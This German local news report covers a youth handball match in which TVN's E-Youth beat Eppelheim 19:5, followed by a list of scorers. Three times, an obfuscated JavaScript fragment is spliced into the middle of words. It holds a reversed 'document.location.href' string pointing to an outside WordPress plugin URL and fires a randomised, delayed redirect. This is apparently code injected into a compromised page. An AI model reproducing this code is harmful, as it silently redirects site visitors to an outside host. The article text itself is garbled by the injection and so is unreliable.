Erfolgreicher Jahresabschluss der TVN E-Jugend

Neckargemünd, 18.12.2011 (str) – Am Sonntag hatte die E-Jugend wie alle anderen Mannschaften des TVN ihr letztes Spiel in diesem Jahr. Passend zur weihnachtlichen Stimmung gelang den sehr gut aufgelegten Jungen und Mädchen mit 19:5 (mit Multiplikatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor 190:15) ein Kantersieg gegen die Gäste aus Eppelheim. Der Sieg war umso erfreulicher, da sich der TVN im Hinspiel doch deutlich schwerer getan und knapp verloren hatte.

Mit großem Einsatz und Engagement dabei: Trainerin Sylvia Trunzer mit Ihren Schützlingen

Die Gastgeber kontrollierten das Spiel von Anfang an und zogen schnell auf 7:0 davon, bevor den Gästen überhaupt das erste Tor gelang. Während im Angriff fast alles gelang – die Jungs und Mädchen überzeugten durch schnelles Passspiel und sehr hohe Fangsicherheit – vereitelte Torwart Colin Schmoll mit toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tollen Paraden die wenigen guten Chancen der Gäste. Mit 12:2 ging es in die Pause.

In der zweiten Halbzeit ließ es der TVN etwas ruhiger angehen, ohne jedoch die spielerische Überlegenheit aufzugeben. So kam es folgerichtig zum deutlichen Sieg. Die Freude von Trainerin Sylvia Trunzer, bei der sich die Eltern der Jungs und Mädels auch für ihr toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolles Engagement bedankten, war entsprechend groß.

Für den TVN im Einsatz:

Johannes Schaum (7), Ronja Gölz (2), Danny Kinzig (2), Colin Schmoll (2), Elissa Bull (1), Valentin Geißler(1), Leon Göppert (1), Lars Harant (1), Francisco Monsalve (1), Mika Paulus (1), Jana Wagner